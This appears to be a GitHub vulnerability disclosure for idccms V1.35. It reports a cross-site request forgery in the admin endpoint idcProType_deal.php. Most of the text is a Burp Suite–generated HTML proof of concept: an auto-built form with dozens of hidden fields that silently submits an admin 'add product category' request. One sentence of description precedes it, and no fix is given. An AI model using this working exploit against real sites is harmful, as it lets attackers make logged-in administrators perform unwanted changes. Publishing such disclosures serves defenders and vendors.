target:http://idccms.com/ version: V1.35
idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component http://127.0.0.1:80/admin/idcProType_deal.php?mudi=add&nohrefStr=close
POC:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:80/admin/idcProType_deal.php?mudi=add&nohrefStr=close" method="POST">
      <input type="hidden" name="dataID" value="0" />
			<input type="hidden" name="dataTypeCN" value="IDC%E5%95%86%E5%93%81%E7%B1%BB%E5%88%AB" />
			<input type="hidden" name="dataType" value="" />
			<input type="hidden" name="dataMode" value="" />
			<input type="hidden" name="dataModeStr" value="" />
			<input type="hidden" name="backURL" value="http%3A%2F%2F127.0.0.1%2Fadmin%2FidcProType.php%3Fmudi%3Dmanage%26dataMode%3D%26dataModeStr%3D%26dataType%3D%26dataTypeCN%3DIDC%25E5%2595%2586%25E5%2593%2581%25E7%25B1%25BB%25E5%2588%25AB%26dataType2%3D%26dataID%3D0%26menuID%3D915" />
			<input type="hidden" name="theme" value="cs" />
			<input type="hidden" name="oldFatID" value="0" />
			<input type="hidden" name="fatID" value="" />
			<input type="hidden" name="webKey" value="" />
			<input type="hidden" name="webDesc" value="" />
			<input type="hidden" name="mode" value="0" />
			<input type="hidden" name="isHome" value="1" />
			<input type="hidden" name="homeColor" value="" />
			<input type="hidden" name="homeNum" value="10" />
			<input type="hidden" name="isHomeWap" value="1" />
			<input type="hidden" name="homeWapNum" value="10" />
			<input type="hidden" name="fieldNum" value="0" />
			<input type="hidden" name="fieldJud1" value="1" />
			<input type="hidden" name="fieldName1" value="" />
			<input type="hidden" name="fieldColor1" value="" />
			<input type="hidden" name="fieldHome1" value="1" />
			<input type="hidden" name="fieldRank1" value="10" />
			<input type="hidden" name="fieldWidth1" value="" />
			<input type="hidden" name="fieldAlign1" value="center" />
			<input type="hidden" name="fieldJud2" value="1" />
			<input type="hidden" name="fieldName2" value="" />
			<input type="hidden" name="fieldColor2" value="" />
			<input type="hidden" name="fieldHome2" value="1" />
			<input type="hidden" name="fieldRank2" value="20" />
			<input type="hidden" name="fieldWidth2" value="" />
			<input type="hidden" name="fieldAlign2" value="center" />
			<input type="hidden" name="fieldJud3" value="1" />
			<input type="hidden" name="fieldName3" value="" />
			<input type="hidden" name="fieldColor3" value="" />
			<input type="hidden" name="fieldHome3" value="1" />
			<input type="hidden" name="fieldRank3" value="30" />
			<input type="hidden" name="fieldWidth3" value="" />
			<input type="hidden" name="fieldAlign3" value="center" />
			<input type="hidden" name="fieldJud4" value="1" />
			<input type="hidden" name="fieldName4" value="" />
			<input type="hidden" name="fieldColor4" value="" />
			<input type="hidden" name="fieldHome4" value="1" />
			<input type="hidden" name="fieldRank4" value="40" />
			<input type="hidden" name="fieldWidth4" value="" />
			<input type="hidden" name="fieldAlign4" value="center" />
			<input type="hidden" name="fieldJud5" value="1" />
			<input type="hidden" name="fieldName5" value="" />
			<input type="hidden" name="fieldColor5" value="" />
			<input type="hidden" name="fieldHome5" value="1" />
			<input type="hidden" name="fieldRank5" value="50" />
			<input type="hidden" name="fieldWidth5" value="" />
			<input type="hidden" name="fieldAlign5" value="center" />
			<input type="hidden" name="fieldJud6" value="1" />
			<input type="hidden" name="fieldName6" value="" />
			<input type="hidden" name="fieldColor6" value="" />
			<input type="hidden" name="fieldHome6" value="1" />
			<input type="hidden" name="fieldRank6" value="60" />
			<input type="hidden" name="fieldWidth6" value="" />
			<input type="hidden" name="fieldAlign6" value="center" />
			<input type="hidden" name="fieldJud7" value="1" />
			<input type="hidden" name="fieldName7" value="" />
			<input type="hidden" name="fieldColor7" value="" />
			<input type="hidden" name="fieldHome7" value="1" />
			<input type="hidden" name="fieldRank7" value="70" />
			<input type="hidden" name="fieldWidth7" value="" />
			<input type="hidden" name="fieldAlign7" value="center" />
			<input type="hidden" name="fieldJud8" value="1" />
			<input type="hidden" name="fieldName8" value="" />
			<input type="hidden" name="fieldColor8" value="" />
			<input type="hidden" name="fieldHome8" value="1" />
			<input type="hidden" name="fieldRank8" value="80" />
			<input type="hidden" name="fieldWidth8" value="" />
			<input type="hidden" name="fieldAlign8" value="center" />
			<input type="hidden" name="fieldJud9" value="1" />
			<input type="hidden" name="fieldName9" value="" />
			<input type="hidden" name="fieldColor9" value="" />
			<input type="hidden" name="fieldHome9" value="1" />
			<input type="hidden" name="fieldRank9" value="90" />
			<input type="hidden" name="fieldWidth9" value="" />
			<input type="hidden" name="fieldAlign9" value="center" />
			<input type="hidden" name="fieldJud10" value="1" />
			<input type="hidden" name="fieldName10" value="" />
			<input type="hidden" name="fieldColor10" value="" />
			<input type="hidden" name="fieldHome10" value="1" />
			<input type="hidden" name="fieldRank10" value="100" />
			<input type="hidden" name="fieldWidth10" value="" />
			<input type="hidden" name="fieldAlign10" value="center" />
			<input type="hidden" name="fieldJud11" value="1" />
			<input type="hidden" name="fieldName11" value="" />
			<input type="hidden" name="fieldColor11" value="" />
			<input type="hidden" name="fieldHome11" value="1" />
			<input type="hidden" name="fieldRank11" value="110" />
			<input type="hidden" name="fieldWidth11" value="" />
			<input type="hidden" name="fieldAlign11" value="center" />
			<input type="hidden" name="fieldJud12" value="1" />
			<input type="hidden" name="fieldName12" value="" />
			<input type="hidden" name="fieldColor12" value="" />
			<input type="hidden" name="fieldHome12" value="1" />
			<input type="hidden" name="fieldRank12" value="120" />
			<input type="hidden" name="fieldWidth12" value="" />
			<input type="hidden" name="fieldAlign12" value="center" />
			<input type="hidden" name="priceType" value="" />
			<input type="hidden" name="tixing" value="" />
			<input type="hidden" name="upImgStr" value="" />
			<input type="hidden" name="note" value="" />
			<input type="hidden" name="htmlNameOld" value="" />
			<input type="hidden" name="htmlName" value="" />
			<input type="hidden" name="rank" value="395" />
			<input type="hidden" name="state" value="1" />
			<input type="hidden" name="wapState" value="1" />
			<input type="hidden" name="x" value="0" />
			<input type="hidden" name="y" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Provide feedback

Saved searches

Use saved searches to filter your results more quickly

csrf.md

csrf.md

Files

csrf.md

Latest commit

History

csrf.md

File metadata and controls
